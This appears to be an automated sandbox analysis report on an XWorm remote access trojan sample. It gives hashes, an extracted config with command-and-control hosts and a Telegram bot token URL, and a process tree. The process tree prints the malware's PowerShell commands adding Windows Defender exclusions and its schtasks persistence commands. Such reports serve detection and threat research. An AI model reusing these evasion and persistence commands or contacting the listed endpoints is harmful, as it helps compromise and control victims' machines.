Analysis

  • max time kernel
    147s
  • max time network
    151s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240426-en
  • resource tags

    arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    30-05-2024 10:48

General

  • Target

    30a110aa704b2beebbe56ad92cc4910defd943360d6bc10113e7fc17f9c31e7d.exe

  • Size

    515KB

  • MD5

    148b2c38cf0726535d760a703f803c80

  • SHA1

    107503ca149f547d4745fe9b9a3fbae03d60126c

  • SHA256

    30a110aa704b2beebbe56ad92cc4910defd943360d6bc10113e7fc17f9c31e7d

  • SHA512

    6b9c13d80fb24924604245f9046c28df75d009c6cd6f819ef2ac6e99a592acfc84473b4fcc6e2c1ccafd6001bb4a931a8ced6a968bd874e2ebf81cd8c714bdbd

  • SSDEEP

    12288:EMbx504bFjsNfn8lmwaYy//2hWc8CYBMQI4aqNA:Lbw4bR689aYy//2hDPYBMQI4aqN

Malware Config

Extracted

Family

xworm

C2

127.0.0.1:7000

beshomandotestbesnd.run.place:7000

Attributes
  • Install_directory

    %ProgramData%

  • install_file

    cmd.exe

  • telegram

    https://api.telegram.org/bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 5 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 31 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\30a110aa704b2beebbe56ad92cc4910defd943360d6bc10113e7fc17f9c31e7d.exe
    "C:\Users\Admin\AppData\Local\Temp\30a110aa704b2beebbe56ad92cc4910defd943360d6bc10113e7fc17f9c31e7d.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:448
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\30a110aa704b2beebbe56ad92cc4910defd943360d6bc10113e7fc17f9c31e7d.exe"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1512
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\DzmQEVPXhX.exe"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4208
    • C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DzmQEVPXhX" /XML "C:\Users\Admin\AppData\Local\Temp\tmp6F83.tmp"
      2⤵
      • Creates scheduled task(s)
      PID:4104
    • C:\Users\Admin\AppData\Local\Temp\30a110aa704b2beebbe56ad92cc4910defd943360d6bc10113e7fc17f9c31e7d.exe
      "C:\Users\Admin\AppData\Local\Temp\30a110aa704b2beebbe56ad92cc4910defd943360d6bc10113e7fc17f9c31e7d.exe"
      2⤵
      • Drops startup file
      • Adds Run key to start application
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4792
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\30a110aa704b2beebbe56ad92cc4910defd943360d6bc10113e7fc17f9c31e7d.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1900
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '30a110aa704b2beebbe56ad92cc4910defd943360d6bc10113e7fc17f9c31e7d.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2096
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\cmd.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3164
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'cmd.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1912
      • C:\Windows\SysWOW64\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "cmd" /tr "C:\ProgramData\cmd.exe"
        3⤵
        • Creates scheduled task(s)
        PID:4880
  • C:\ProgramData\cmd.exe
    C:\ProgramData\cmd.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2140
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData\cmd.exe"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3252
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\DzmQEVPXhX.exe"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:552
    • C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DzmQEVPXhX" /XML "C:\Users\Admin\AppData\Local\Temp\tmp1855.tmp"
      2⤵
      • Creates scheduled task(s)
      PID:1384
    • C:\ProgramData\cmd.exe
      "C:\ProgramData\cmd.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:1980
  • C:\ProgramData\cmd.exe
    C:\ProgramData\cmd.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1464
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData\cmd.exe"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3224
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\DzmQEVPXhX.exe"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2872
    • C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DzmQEVPXhX" /XML "C:\Users\Admin\AppData\Local\Temp\tmp2E4.tmp"
      2⤵
      • Creates scheduled task(s)
      PID:4184
    • C:\ProgramData\cmd.exe
      "C:\ProgramData\cmd.exe"
      2⤵
      • Executes dropped EXE
      PID:4752
    • C:\ProgramData\cmd.exe
      "C:\ProgramData\cmd.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:4848

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\cmd.exe

    Filesize

    515KB

    MD5

    148b2c38cf0726535d760a703f803c80

    SHA1

    107503ca149f547d4745fe9b9a3fbae03d60126c

    SHA256

    30a110aa704b2beebbe56ad92cc4910defd943360d6bc10113e7fc17f9c31e7d

    SHA512

    6b9c13d80fb24924604245f9046c28df75d009c6cd6f819ef2ac6e99a592acfc84473b4fcc6e2c1ccafd6001bb4a931a8ced6a968bd874e2ebf81cd8c714bdbd

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\cmd.exe.log

    Filesize

    1KB

    MD5

    7e1ed0055c3eaa0bbc4a29ec1ef15a6a

    SHA1

    765b954c1adbb6a6ecc4fe912fdaa6d0fba0ae7d

    SHA256

    4c17576f64dea465c45a50573ee41771f7be9962ab2d07f961af4df5589bdcce

    SHA512

    de7c784c37d18c43820908add88f08ab4864c0ef3f9d158cc2c9d1bab120613cb093dd4bfc5d7ed0c289414956cfe0b213c386f8e6b5753847dec915566297c8

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    d0c46cad6c0778401e21910bd6b56b70

    SHA1

    7be418951ea96326aca445b8dfe449b2bfa0dca6

    SHA256

    9600b3fdf0565ccb49e21656aa4b24d7c18f776bfd04d9ee984b134707550f02

    SHA512

    057531b468f7fbbb2175a696a8aab274dec0d17d9f71df309edcff35e064f3378050066a3df47ccd03048fac461594ec75e3d4fe64f9dd79949d129f51e02949

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    18KB

    MD5

    35cc1083b96d6fdf3b354595d023b416

    SHA1

    32a189877e258c0abacdb5ed5a4852494499fed6

    SHA256

    3d70cab2c75d1087dd2ec9b00c45dac33241870faebbdc087aa5f05e2f155598

    SHA512

    668e9f75bf611e0a2a1084485ff7b9f74e3deac00b7f5a969634d16c215e4ba273150077f879049de39b6ec4c0e9f7e5a85638298b4645df2e33dc600ea17f54

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    18KB

    MD5

    586be1631dfb052b572c3f8c5532d17b

    SHA1

    59b7969e8fe6d72a4bf5a9b2aebdda2524445565

    SHA256

    9209f52e842b7fbf2d2a3339a5c5157b5dbef8ebad211458682213f22752ba17

    SHA512

    ab4790f084cf26709036e6ee5716d86da904a11344c9c549163c9f3a98d2c5e97113febf46038005ae3f4a6839a98af3e429652bf01188df7c41a4768a84c2ea

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    18KB

    MD5

    b4bb961a0ab70bd4e45ea6e9a091383d

    SHA1

    b48c8b1b87bdfc328b4c50088ba91bfe7bb31729

    SHA256

    deeb959c44207caa7bd042d4fec295c510a47fa3a4bbb766a84c9e518bc80d7f

    SHA512

    ab0aeeee0b99cadecb9d27ba1c00129ee84db29818c02ee1748e971c6fec63a7ea87c05265afbb6be2708aeb279a085bd3a564c3ee84f27d2485333eb3a436f8

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    18KB

    MD5

    0dfed1a3a2692cc64f6714ddb146b3c7

    SHA1

    30338478a9eeb58136d592bea7b40a4a00cf86e1

    SHA256

    f33e040f5c83c0247ea4f19cc9cdbcb82e9c8286a57da4c000c7635cc74fdb61

    SHA512

    72e49732690f31b2a8719286969b1e383a08c5470bd930eac98aa781b0d95d91a174f3a51224929ec1986b54a7e2fdc22d5aa2fd59fe4c9a38ee93864bc5ffa4

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    764B

    MD5

    39f866b4629c3c663c8fde18b8fc0c67

    SHA1

    43ae5ac9ff79697eb16653e317078ceef83f041d

    SHA256

    4fb494dab2f5566e5343110239107204560e7e42c6d91cdb8d385ca6d723f780

    SHA512

    db553f197329c3a93912f8283a06678b69d161c641797478b20e116b8ae93e548cccde1bdb1f998c92e0789b73cbed35f6e3506495ad9ed28c513466be093854

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    18KB

    MD5

    1be91d3b16f687cb8650641c0e954365

    SHA1

    b15ac5a31e6d30b9b39d2b8d242555bfb4a42e61

    SHA256

    7a1402c8dfd35609c44655a2a0ab550d9e2c0581d666ac43dcf5711b93263715

    SHA512

    0ab6681dc15d8d5e40861b8e8a6498166a13148d881999c6eba2b8698ba9ac678619e593c2be4f0324d512a98d60329a24ecb2c9ed37024e85fbe151c93b43a3

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    933B

    MD5

    0b3e181e6fe0a4c3f6a2c4faef295d62

    SHA1

    79d05d6dbd8d3eb96a951c7e7d050b9ccf55b5ff

    SHA256

    20df32390747f60380eb83c99f6303744e92a93641576327d08bb25339c08d93

    SHA512

    8ff98c549a671ed48553344bbe09fd2885d7fa2bca49baa4808689cdbea2235636fdaafda784d1d6e2ace520d116ae524d22efa5f74c71a1ce4ef6503e9be80b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    18KB

    MD5

    849845ec2e46f54e714eb21fa6a6b70a

    SHA1

    89db2ad9c3e0555c7777f240de03280296b4ab8e

    SHA256

    bfabef46490fa7834586a22bf1d2612c52c0ebeb33abe37596ff490d1b97f4b0

    SHA512

    64bb0b7675ea16a82b48d0f781134d53d040094b2f63b305c77bccd57b449bb0c2c370201bcd85f3b1ccba06f33acf78c50d051a3940b1a3f3937d31f0f55af2

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gb0ijalp.tbs.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\explorer.exe

    Filesize

    1KB

    MD5

    d57d916875a6fb8584172de1562bce6d

    SHA1

    8e2e584fa99c2db2990785f635d5cc734cf24835

    SHA256

    15035952ee61f538b5ef91c1ea1f3d1a3156ab10487fb79645bd25050a2140b1

    SHA512

    fcc3f0a554250cee3fb0d1e425ce88d366d37c9da04da061c8dff58524e3a5f247df24781e3d59819732ed862158a0f5d80c866994182eb43670230f4f3cb3c8

  • C:\Users\Admin\AppData\Local\Temp\explorer.exe

    Filesize

    1KB

    MD5

    6d06702e536b9150559a6f5d70b87f51

    SHA1

    837588b879ccd6484939b5988965206e98efe89b

    SHA256

    8979278847e0049fb08bcc8cb839e9a77549e656d35eeb0c182d0af929cfc40f

    SHA512

    e29d38649bff45e84bc369d01aefc97569e610bf4d301aede6ba78819016c9bbbb2e6feddb278915ccf33c10c28214f8834bfcd11311325367a4454369ca1d8d

  • C:\Users\Admin\AppData\Local\Temp\explorer.exe

    Filesize

    1KB

    MD5

    8176c83c8f4957d82ba48d41c9040fe1

    SHA1

    35ad0cbc2346beff9497b5e36635d0b23310584b

    SHA256

    36fcc2294027cd8438fe15c26569c943c7b3b285beb8ac9d1811d994d4bb218f

    SHA512

    e5171a49130605547ba576bf50981829ccd438c067b36b145e9432ece74b7a3da06b8b5f7a428e65581c36cb974c0f83b3ceed5d3b0d1f7555c4c69484add128

  • C:\Users\Admin\AppData\Local\Temp\tmp6F83.tmp

    Filesize

    1KB

    MD5

    505f641ceb834335fc54278230b88237

    SHA1

    da70556b826880706513ce85fdd52cf708269c6e

    SHA256

    e2443a7e94ad3497df971a33d8d3a86f9ca145a35a6f74f44299ec49a1fe8c3e

    SHA512

    9e938624f445a1b82778d43594a46c090386735c38548635a93b2283ae60aa7991ed6b5a07d9a6c2eb31cb4e8db70aabc09d1e632e950a2adc349c24bfe1cc31

  • memory/448-7-0x00000000084C0000-0x00000000084D0000-memory.dmp

    Filesize

    64KB

  • memory/448-0-0x000000007461E000-0x000000007461F000-memory.dmp

    Filesize

    4KB

  • memory/448-5-0x0000000074610000-0x0000000074DC1000-memory.dmp

    Filesize

    7.7MB

  • memory/448-4-0x0000000005860000-0x000000000586A000-memory.dmp

    Filesize

    40KB

  • memory/448-3-0x00000000058F0000-0x0000000005982000-memory.dmp

    Filesize

    584KB

  • memory/448-6-0x00000000083A0000-0x00000000083BA000-memory.dmp

    Filesize

    104KB

  • memory/448-8-0x0000000008700000-0x000000000875A000-memory.dmp

    Filesize

    360KB

  • memory/448-2-0x0000000005E00000-0x00000000063A6000-memory.dmp

    Filesize

    5.6MB

  • memory/448-53-0x0000000074610000-0x0000000074DC1000-memory.dmp

    Filesize

    7.7MB

  • memory/448-1-0x0000000000D20000-0x0000000000DA8000-memory.dmp

    Filesize

    544KB

  • memory/448-9-0x000000000AE80000-0x000000000AF1C000-memory.dmp

    Filesize

    624KB

  • memory/552-223-0x000000006EBC0000-0x000000006EC0C000-memory.dmp

    Filesize

    304KB

  • memory/1512-26-0x0000000005E30000-0x0000000006187000-memory.dmp

    Filesize

    3.3MB

  • memory/1512-55-0x000000006F120000-0x000000006F16C000-memory.dmp

    Filesize

    304KB

  • memory/1512-66-0x0000000007B90000-0x000000000820A000-memory.dmp

    Filesize

    6.5MB

  • memory/1512-67-0x0000000007540000-0x000000000755A000-memory.dmp

    Filesize

    104KB

  • memory/1512-68-0x00000000075C0000-0x00000000075CA000-memory.dmp

    Filesize

    40KB

  • memory/1512-69-0x00000000077D0000-0x0000000007866000-memory.dmp

    Filesize

    600KB

  • memory/1512-70-0x0000000007750000-0x0000000007761000-memory.dmp

    Filesize

    68KB

  • memory/1512-71-0x0000000007780000-0x000000000778E000-memory.dmp

    Filesize

    56KB

  • memory/1512-10-0x00000000029E0000-0x0000000002A16000-memory.dmp

    Filesize

    216KB

  • memory/1512-81-0x0000000007790000-0x00000000077A5000-memory.dmp

    Filesize

    84KB

  • memory/1512-82-0x0000000007890000-0x00000000078AA000-memory.dmp

    Filesize

    104KB

  • memory/1512-83-0x0000000007880000-0x0000000007888000-memory.dmp

    Filesize

    32KB

  • memory/1512-86-0x0000000074610000-0x0000000074DC1000-memory.dmp

    Filesize

    7.7MB

  • memory/1512-28-0x0000000006230000-0x000000000627C000-memory.dmp

    Filesize

    304KB

  • memory/1512-64-0x00000000067D0000-0x00000000067EE000-memory.dmp

    Filesize

    120KB

  • memory/1512-14-0x0000000074610000-0x0000000074DC1000-memory.dmp

    Filesize

    7.7MB

  • memory/1512-16-0x0000000005CC0000-0x0000000005D26000-memory.dmp

    Filesize

    408KB

  • memory/1512-65-0x00000000073F0000-0x0000000007494000-memory.dmp

    Filesize

    656KB

  • memory/1512-12-0x0000000005530000-0x0000000005B5A000-memory.dmp

    Filesize

    6.2MB

  • memory/1512-13-0x0000000005480000-0x00000000054A2000-memory.dmp

    Filesize

    136KB

  • memory/1512-11-0x0000000074610000-0x0000000074DC1000-memory.dmp

    Filesize

    7.7MB

  • memory/1512-54-0x00000000067F0000-0x0000000006824000-memory.dmp

    Filesize

    208KB

  • memory/1512-15-0x0000000005C50000-0x0000000005CB6000-memory.dmp

    Filesize

    408KB

  • memory/1512-25-0x0000000074610000-0x0000000074DC1000-memory.dmp

    Filesize

    7.7MB

  • memory/1512-27-0x0000000006210000-0x000000000622E000-memory.dmp

    Filesize

    120KB

  • memory/1900-111-0x0000000007500000-0x0000000007511000-memory.dmp

    Filesize

    68KB

  • memory/1900-112-0x0000000007540000-0x0000000007555000-memory.dmp

    Filesize

    84KB

  • memory/1900-110-0x0000000007170000-0x0000000007214000-memory.dmp

    Filesize

    656KB

  • memory/1900-101-0x0000000070D40000-0x0000000070D8C000-memory.dmp

    Filesize

    304KB

  • memory/1900-100-0x0000000005FC0000-0x000000000600C000-memory.dmp

    Filesize

    304KB

  • memory/1900-98-0x0000000005B70000-0x0000000005EC7000-memory.dmp

    Filesize

    3.3MB

  • memory/1912-161-0x0000000070D40000-0x0000000070D8C000-memory.dmp

    Filesize

    304KB

  • memory/2096-123-0x0000000070D40000-0x0000000070D8C000-memory.dmp

    Filesize

    304KB

  • memory/2872-281-0x000000006EC60000-0x000000006ECAC000-memory.dmp

    Filesize

    304KB

  • memory/3164-142-0x0000000070D40000-0x0000000070D8C000-memory.dmp

    Filesize

    304KB

  • memory/3224-272-0x000000006EC60000-0x000000006ECAC000-memory.dmp

    Filesize

    304KB

  • memory/3224-258-0x0000000006DB0000-0x0000000006DFC000-memory.dmp

    Filesize

    304KB

  • memory/3224-239-0x00000000062C0000-0x0000000006617000-memory.dmp

    Filesize

    3.3MB

  • memory/3252-221-0x0000000007210000-0x0000000007221000-memory.dmp

    Filesize

    68KB

  • memory/3252-222-0x0000000007250000-0x0000000007265000-memory.dmp

    Filesize

    84KB

  • memory/3252-220-0x0000000006F30000-0x0000000006FD4000-memory.dmp

    Filesize

    656KB

  • memory/3252-211-0x000000006EBC0000-0x000000006EC0C000-memory.dmp

    Filesize

    304KB

  • memory/3252-188-0x0000000005D20000-0x0000000005D6C000-memory.dmp

    Filesize

    304KB

  • memory/3252-178-0x0000000005710000-0x0000000005A67000-memory.dmp

    Filesize

    3.3MB

  • memory/4208-72-0x000000006F120000-0x000000006F16C000-memory.dmp

    Filesize

    304KB

  • memory/4792-51-0x0000000000400000-0x0000000000418000-memory.dmp

    Filesize

    96KB